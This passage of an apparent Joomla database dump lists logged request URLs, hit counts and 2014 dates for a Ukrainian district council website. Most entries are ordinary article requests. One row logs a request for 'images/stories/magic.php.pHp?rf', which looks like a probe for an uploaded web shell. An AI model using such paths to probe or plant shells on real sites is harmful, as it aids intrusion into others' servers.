00:00:00',301),(4072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-22 05:53:11','0000-00-00 00:00:00',301),(4073,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53&Itemid=94&lang=en','','','',1,0,'2014-09-22 05:53:20','0000-00-00 00:00:00',301),(4074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:--------------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-22 05:56:18','0000-00-00 00:00:00',301),(4075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-22 05:57:00','0000-00-00 00:00:00',301),(4076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=ru','','','',6,0,'2014-09-22 05:57:06','0000-00-00 00:00:00',301),(4077,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53&Itemid=94&lang=en','','','',1,0,'2014-09-22 05:58:31','0000-00-00 00:00:00',301),(4078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-22 06:02:34','0000-00-00 00:00:00',301),(4079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:-21022013-&Itemid=86&lang=ru','','','',15,0,'2014-09-22 06:04:11','0000-00-00 00:00:00',301),(4080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-22 06:04:13','0000-00-00 00:00:00',301),(4081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=uk','','','',5,0,'2014-09-22 06:04:16','0000-00-00 00:00:00',301),(4082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=ru','','','',6,0,'2014-09-22 06:05:02','0000-00-00 00:00:00',301),(4083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en','','','',2,0,'2014-09-22 06:05:45','0000-00-00 00:00:00',301),(4084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53&Itemid=94&lang=ru','','','',5,0,'2014-09-22 06:08:00','0000-00-00 00:00:00',301),(4085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-22 06:10:15','0000-00-00 00:00:00',301),(4086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=en','','','',5,0,'2014-09-22 06:10:24','0000-00-00 00:00:00',301),(4087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=ru','','','',1,0,'2014-09-22 06:10:33','0000-00-00 00:00:00',301),(4088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-22 06:10:51','0000-00-00 00:00:00',301),(4089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-22 06:11:07','0000-00-00 00:00:00',301),(4090,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-22 06:13:31','0000-00-00 00:00:00',301),(4091,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en&Itemid=','','','',1,0,'2014-09-22 06:16:19','0000-00-00 00:00:00',301),(4092,'http://malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en&Itemid=','','','',1,0,'2014-09-22 06:16:28','0000-00-00 00:00:00',301),(4093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=en','','','',7,0,'2014-09-22 06:17:22','0000-00-00 00:00:00',301),(4094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-22 06:18:52','0000-00-00 00:00:00',301),(4095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=uk','','','',3,0,'2014-09-22 06:19:01','0000-00-00 00:00:00',301),(4096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:--21022013-&Itemid=86&lang=uk','','','',1,0,'2014-09-22 06:20:01','0000-00-00 00:00:00',301),(4097,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-22 06:20:23','0000-00-00 00:00:00',301),(4098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:--21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-22 06:21:36','0000-00-00 00:00:00',301),(4099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-22 06:21:42','0000-00-00 00:00:00',301),(4100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 06:27:34','0000-00-00 00:00:00',301),(4101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=899:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-09-22 06:29:41','0000-00-00 00:00:00',301),(4102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=ru','','','',3,0,'2014-09-22 06:30:56','0000-00-00 00:00:00',301),(4103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59&Itemid=107&lang=en','','','',3,0,'2014-09-22 06:31:02','0000-00-00 00:00:00',301),(4104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=en','','','',2,0,'2014-09-22 06:31:44','0000-00-00 00:00:00',301),(4105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-22 06:34:23','0000-00-00 00:00:00',301),(4106,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-22 06:34:26','0000-00-00 00:00:00',301),(4107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-22 06:34:37','0000-00-00 00:00:00',301),(4108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59:--20062014-&Itemid=107&lang=en','','','',6,0,'2014-09-22 06:36:40','0000-00-00 00:00:00',301),(4109,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-22 06:37:14','0000-00-00 00:00:00',301),(4110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-22 06:37:23','0000-00-00 00:00:00',301),(4111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-22 06:37:35','0000-00-00 00:00:00',301),(4112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-22 06:38:10','0000-00-00 00:00:00',301),(4113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-22 06:39:15','0000-00-00 00:00:00',301),(4114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=en','','','',1,0,'2014-09-22 06:39:25','0000-00-00 00:00:00',301),(4115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-22 06:42:05','0000-00-00 00:00:00',301),(4116,'http://malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en&Itemid=0','','','',1,0,'2014-09-22 06:45:55','0000-00-00 00:00:00',301),(4117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-22 06:46:12','0000-00-00 00:00:00',301),(4118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-22 06:48:18','0000-00-00 00:00:00',301),(4119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-22 06:48:27','0000-00-00 00:00:00',301),(4120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',45,0,'2014-09-22 06:52:26','0000-00-00 00:00:00',301),(4121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=uk','','','',3,0,'2014-09-22 06:54:08','0000-00-00 00:00:00',301),(4122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-22 06:55:35','0000-00-00 00:00:00',301),(4123,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-22 06:57:45','0000-00-00 00:00:00',301),(4124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-22 07:00:21','0000-00-00 00:00:00',301),(4125,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-22 07:02:53','0000-00-00 00:00:00',301),(4126,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 07:05:50','0000-00-00 00:00:00',301),(4127,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-22 07:09:04','0000-00-00 00:00:00',301),(4128,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-22 07:10:40','0000-00-00 00:00:00',301),(4129,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-09-22 07:10:50','0000-00-00 00:00:00',301),(4130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-22 07:12:36','0000-00-00 00:00:00',301),(4131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Byandsearch%3Bweb%3B%3B&text=&etext=455.pzZKtJ_k_B1B3b-2eoxD2s0IzT-ApfIUrZ4CBUMcIGQRBvDYuxmXbRk7uQkgPY7U','',13,0,'2014-09-22 07:13:26','0000-00-00 00:00:00',301),(4132,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-22 07:13:34','0000-00-00 00:00:00',301),(4133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-22 07:23:46','0000-00-00 00:00:00',301),(4134,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-22 07:26:01','0000-00-00 00:00:00',301),(4135,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-22 07:33:46','0000-00-00 00:00:00',301),(4136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-22 07:46:33','0000-00-00 00:00:00',301),(4137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-22 07:50:17','0000-00-00 00:00:00',301),(4138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk','','','',8,0,'2014-09-22 07:55:28','0000-00-00 00:00:00',301),(4139,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',3,0,'2014-09-22 08:03:11','0000-00-00 00:00:00',301),(4140,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1349:-31-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-22 08:08:02','0000-00-00 00:00:00',301),(4141,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-22 08:15:53','0000-00-00 00:00:00',301),(4142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-22 08:27:57','0000-00-00 00:00:00',301),(4143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-09-22 08:34:06','0000-00-00 00:00:00',301),(4144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-22 08:50:09','0000-00-00 00:00:00',301),(4145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:--21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-22 08:54:50','0000-00-00 00:00:00',301),(4146,'http://www.malyn-rayrada.org.ua/images/stories/magic.php.pHp?rf','','','',1,0,'2014-09-22 09:03:57','0000-00-00 00:00:00',301),(4147,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk','','','',2,0,'2014-09-22 09:05:00','0000-00-00 00:00:00',301),(4148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=877:-2013-2015-&catid=46:--21122012&Itemid=85&lang=uk','','','',1,0,'2014-09-22 09:09:07','0000-00-00 00:00:00',301),(4149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-22 09:10:27','0000-00-00 00:00:00',301),(4150,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/533-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_2','',9,0,'2014-09-22 09:11:27','0000-00-00 00:00:00',301),(4151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-22 09:14:58','0000-00-00 00:00:00',301),(4152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-22 09:15:38','0000-00-00 00:00:00',301),(4153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57:--15042014-&Itemid=98&lang=en','','','',6,0,'2014-09-22 09:15:44','0000-00-00 00:00:00',301),(4154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=uk','','','',7,0,'2014-09-22 09:15:59','0000-00-00 00:00:00',301),(4155,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp','',13,0,'2014-09-22 09:16:30','0000-00-00 00:00:00',301),(4156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-22 09:20:17','0000-00-00 00:00:00',301),(4157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en','','','',2,0,'2014-09-22 09:20:36','0000-00-00 00:00:00',301),(4158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-22 09:21:05','0000-00-00 00:00:00',301),(4159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=en','','','',5,0,'2014-09-22 09:21:12','0000-00-00 00:00:00',301),(4160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',38,0,'2014-09-22 09:21:37','0000-00-00 00:00:00',301),(4161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-22 09:21:42','0000-00-00 00:00:00',301),(4162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-22 09:21:45','0000-00-00 00:00:00',301),(4163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:-21022013-&Itemid=86&lang=uk','','','',6,0,'2014-09-22 09:21:56','0000-00-00 00:00:00',301),(4164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-22 09:23:18','0000-00-00 00:00:00',301),(4165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-22 09:25:33','0000-00-00 00:00:00',301),(4166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-22 09:27:30','0000-00-00 00:00:00',301),(4167,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=en','','','',3,0,'2014-09-22 09:32:39','0000-00-00 00:00:00',301),(4168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-22 09:32:48','0000-00-00 00:00:00',301),(4169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-22 09:38:07','0000-00-00 00:00:00',301),(4170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-22 09:39:58','0000-00-00 00:00:00',301),(4171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-22 09:42:57','0000-00-00 00:00:00',301),(4172,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-22 09:44:21','0000-00-00 00:00:00',301),(4173,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-22 09:47:19','0000-00-00 00:00:00',301),(4174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-22 09:48:50','0000-00-00 00:00:00',301),(4175,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-22 09:48:54','0000-00-00 00:00:00',301),(4176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-22 09:48:56','0000-00-00 00:00:00',301),(4177,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-22 09:50:02','0000-00-00 00:00:00',301),(4178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-22 09:51:16','0000-00-00 00:00:00',301),(4179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-22 09:54:42','0000-00-00 00:00:00',301),(4180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 09:56:16','0000-00-00 00:00:00',301),(4181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-22 10:11:38','0000-00-00 00:00:00',301),(4182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-22 10:14:58','0000-00-00 00:00:00',301),(4183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-22 10:15:09','0000-00-00 00:00:00',301),(4184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:----l---------2011-2014-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-22 10:15:20','0000-00-00 00:00:00',301),(4185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 10:17:36','0000-00-00 00:00:00',301),(4186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-22 10:17:53','0000-00-00 00:00:00',301),(4187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-22 10:24:26','0000-00-00 00:00:00',301),(4188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 10:27:32','0000-00-00 00:00:00',301),(4189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=en','','','',2,0,'2014-09-22 10:28:58','0000-00-00 00:00:00',301),(4190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:----l---------2011-2014-r-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-22 10:30:46','0000-00-00 00:00:00',301),(4191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36&Itemid=70&lang=en','','','',5,0,'2014-09-22 10:36:45','0000-00-00 00:00:00',301),(4192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47:-21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-22 10:43:31','0000-00-00 00:00:00',301),(4193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-22 10:46:50','0000-00-00 00:00:00',301),(4194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-22 10:57:56','0000-00-00 00:00:00',301),(4195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-22 10:57:59','0000-00-00 00:00:00',301),(4196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=en','','','',4,0,'2014-09-22 11:00:13','0000-00-00 00:00:00',301),(4197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-22 11:01:04','0000-00-00 00:00:00',301),(4198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-22 11:01:24','0000-00-00 00:00:00',301),(4199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=uk','','','',8,0,'2014-09-22 11:02:17','0000-00-00 00:00:00',301),(4200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-22 11:04:39','0000-00-00 00:00:00',301),(4201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-22 11:04:41','0000-00-00 00:00:00',301),(4202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-22 11:06:00','0000-00-00 00:00:00',301),(4203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-22 11:07:34','0000-00-00 00:00:00',301),(4204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-22 11:09:30','0000-00-00 00:00:00',301),(4205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-22 11:20:06','0000-00-00 